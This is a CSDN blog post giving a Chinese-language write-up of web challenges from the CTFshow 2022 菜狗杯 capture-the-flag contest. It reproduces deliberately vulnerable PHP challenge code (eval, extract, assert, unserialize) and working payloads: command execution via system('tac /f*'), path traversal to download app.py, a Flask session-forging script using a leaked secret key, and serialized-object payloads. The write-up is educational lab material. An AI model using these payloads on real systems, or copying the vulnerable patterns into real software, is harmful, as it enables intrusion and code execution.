CTFshow 2022 菜狗杯部分WEB WP

最新推荐文章于 2024-03-12 13:27:26 发布
最新推荐文章于 2024-03-12 13:27:26 发布
阅读量1.7k 收藏 3
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/starttv/article/details/127813831
版权

文章目录

web签到

套娃题,自己本地搭环境,慢慢试就试出来了

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 09:38:59
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

Payload:

cookie
CTFshow-QQ群:a
post
a=b
get
?b=c&c[6][0][7][5][8][0][9][4][4]=system('tac /f*');
在这里插入图片描述

在这里插入图片描述

web2 c0me_t0_s1gn

在这里插入图片描述

右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();

在这里插入图片描述
在这里插入图片描述
两个拼接得到flag

我的眼里只有$

题目

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);

extract() 函数从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值。
针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

套娃呗,一直套呗。

Payload
_=a1&a1=a2&a2=a3&a3=a4&a4=a5&a5=a6&a6=a7&a7=a8&a8=a9&a9=a10&a10=a11&a11=a12&a12=a15&a15=a16&a16=a17&a17=a18&a18=a19&a19=a20&a20=a21&a21=a22&a22=a23&a23=a24&a24=a25&a25=a26&a26=a27&a27=a28&a28=a29&a29=a30&a30=a31&a31=a32&a32=a33&a33=a34&a34=a35&a35=a36&a36=a37&a37=system('tac /f*');

抽老婆

在这里插入图片描述
检查源代码发现存在文件下载

在这里插入图片描述

访问download发现debug页面
在这里插入图片描述
可以实现任意文件下载,除了flag。

download?file=../../app.py

下载源码发现在这里插入图片描述
有个session校验,秘钥源码已经给出

app.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'

用脚本跑一下


import hashlib

import flask

from flask.json.tag import TaggedJSONSerializer

from itsdangerous import *


session = {'isadmin': True}

secret = 'tanji_is_A_boy_Yooooooooooooooooooooo!'


print(URLSafeSerializer(secret_key=secret,

                        salt='cookie-session',  # Flask固定的盐,盐和secret会先经过一轮sha1运算,其结果作为下一轮盐和cookie内容生成签名。

                        serializer=TaggedJSONSerializer(),

                        signer=TimestampSigner,

                        signer_kwargs={

                            'key_derivation': 'hmac',

                            'digest_method': hashlib.sha1

                        }

                        ).dumps(session))

在这里插入图片描述
得到session值

在这里插入图片描述
把这里的修改即可得到flag

一言既出

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
    if ($_GET['num'] == 114514){
        assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!");
        echo $flag;
    } 
}

在这里插入图片描述

Payload:
?num=114514%2B1805296

驷马难追

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){
     if ($_GET['num'] == 114514 && check($_GET['num'])){
              assert("intval($_GET[num])==1919810") or die("一言既出,驷马难追!");
              echo $flag;
     } 
} 

function check($str){
  return !preg_match("/[a-z]|\;|\(|\)/",$str);
}

多了个过滤,不过没有影响

Payload:
?num=114514%2B1805296

TapTapTap

在这里插入图片描述

分析habibiScript.js代码发现

在这里插入图片描述

在控制台执行
在这里插入图片描述

访问/secret_path_you_do_not_know/secretfile.txt

在这里插入图片描述

webshell

很简单的反序列化

Payload:

<?php 


    class Webshell {
        public $cmd = 'ls';

        public function __construct() {
            $this->cmd='tac f*';
        }
    }
    $a=new Webshell();
    echo urlencode(serialize($a));
   
?>

O%3A8%3A%22Webshell%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A6%3A%22tac+f%2A%22%3B%7D

在这里插入图片描述

无一幸免


<?php
include "flag.php";
highlight_file(__FILE__);

if (isset($_GET['0'])){
    $arr[$_GET['0']]=1;
    if ($arr[]=1){
        die($flag);
    }
    else{
        die("nonono!");
    }
}

Payload:
?0=0

遍地飘零


<?php
include "flag.php";
highlight_file(__FILE__);

$zeros="000000000000000000000000000000";

foreach($_GET as $key => $value){
    $$key=$$value;
}

if ($flag=="000000000000000000000000000000"){
    echo "好多零";
}else{
    echo "没有零,仔细看看输入有什么问题吧";
    var_dump($_GET);
}

Payload:
?_GET=flag

小舔田

<?php
include "flag.php";
highlight_file(__FILE__);

class Moon{
    public $name="月亮";
    public function __toString(){
        return $this->name;
    }
    
    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="牛夫人";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }
    
    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}

$a=new Moon();
$a->name=new Ion_Fan_Princess();
$a->name->nickname="小甜甜";
echo urlencode(serialize($a));

Payload:

?code=O%3A4%3A%22Moon%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A16%3A%22Ion_Fan_Princess%22%3A1%3A%7Bs%3A8%3A%22nickname%22%3Bs%3A9%3A%22%E5%B0%8F%E7%94%9C%E7%94%9C%22%3B%7D%7D
Sn_u
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow菜狗杯webshell wp
arcuied
12-11 731
ctfshow菜狗杯webshell wp
ctfshow(菜狗杯
qq_62046696的博客
11-28 5654
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTFSHOW菜狗杯解析
最新发布
bafcj的博客
03-12 933
CTF SHOW菜狗杯题解
ctfshow-菜狗杯-WEB-wp
F1rstb100d
11-14 1296
ctfshow-菜狗杯-WEB-wp
CTFshow-菜狗杯-茶歇区-小舔田
qq_31415417的博客
02-16 917
CTFshow-菜狗杯-茶歇区-小舔田
CTFshow-菜狗杯WP
m0_61155226的博客
11-14 5558
然后得到了压缩包中的音频文件,然后发现文件后缀为.wav而不是原本的.mp3,猜测需要使用Silent eye工具 Sound qualit选择high,然后就得到flag啦。这里发现成功破除伪加密(也可以手动修改破伪加密),然后通过文件头判断压缩包中的文件类型为.pyc,并修改文件后缀名为.pyc(否则在线工具无法正常反编译;打开链接发现是看图识美女,要通过30关;访问链接发现是探姬的福利视频(bushi),然后根据提示的摩斯密码不难猜测到黑丝为1,白色为0,然后分割标志为视频的转场动画,
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
2022年第三届“网鼎杯”网络安全大赛(朱雀组)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀组)部分题目附件
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
CTFshow-菜狗杯-web签到
qq_31415417的博客
12-06 3152
CTFshow参数传递的获取、url编码、eval命令执行 解题思路 先是cookie传参再是POST传参再是GET传参再是REQUEST传参最后是eval命令执行分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016构造payload 得到flag
ctfshow菜狗杯wp
m0_62274649的博客
11-17 2260
菜狗杯wp
CTFSHOW菜狗杯 web
羽的博客
11-13 8394
CTFSHOW web
ctfshow-菜狗杯-web(一)
qq_47804678的博客
11-30 2589
_REQUEST[c][6][0][7][5][8][0][9][4][4],其中$_REQUEST是以任何一种方式请求都可以,c为数组,$_REQUEST请求中传入的值是取的C数组中ID键为[6][0][7][5][8][0][9][4][4]的值。eval()函数中的还是变量嵌套(刚开始以为只需要传最后一个$_的值就好了,没想到是不停的变量嵌套),注意都到在POST中传入。首先是给$_赋值:_=a,再给$a赋值,a=b······以此类推一共有36个$,需要赋值36次。于是我们用POST形式发包,
CTF秀--菜狗杯
m0_59022585的博客
07-09 2262
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
【CTFSHOW——菜狗杯
asmartrman的博客
02-19 384
CTFSHOW——菜狗杯题解(更新中)
CTFshow-菜狗杯-LSB探姬-Is_Not_Obfuscate
qq_31415417的博客
02-17 723
CTFshow-菜狗杯-LSB探姬-Is_Not_Obfuscate
CTFshow 菜狗杯 部分wp
weixin_44770698的博客
02-04 2058
ctfshow 菜狗杯 web部分练习(暂时不全)
ctfshow 菜狗杯 一言既出 wp
08-19
- *1* *2* *3* [ctfshow菜狗杯wp](https://blog.csdn.net/m0_62274649/article/details/127899835)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值